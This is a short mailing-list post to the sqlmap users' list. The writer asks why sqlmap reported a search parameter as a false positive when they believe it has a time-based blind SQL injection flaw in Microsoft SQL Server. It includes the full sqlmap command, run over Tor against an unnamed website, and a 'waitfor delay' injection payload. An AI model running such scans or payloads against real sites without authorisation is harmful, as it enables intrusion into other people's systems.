[sqlmap-users] MsSQL - wait command
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] MsSQL - wait command
|
From: hooshmand k <hoo...@gm...> - 2014-12-08 10:52:35
|
Hi, There is a website that vulnerable to SQL injection. I have checked and I'm sure there is blind sql injection vulnerability but the sqlmap could not find this. I tried this command: ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent --risk 3 --level 3 --technique=T --dbms="MsSQL" and the output was something like this: [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable [INFO] checking if the injection point on GET parameter 'search' is a false positive [WARNING] false positive or unexploitable injection point detected [WARNING] GET parameter 'search' is not injectable the "search" parameter is vulnerable to this payload: '); waitfor delay '0:0:0' -- Did I make a mistake or the sqlmap did not find that? Best Regards |
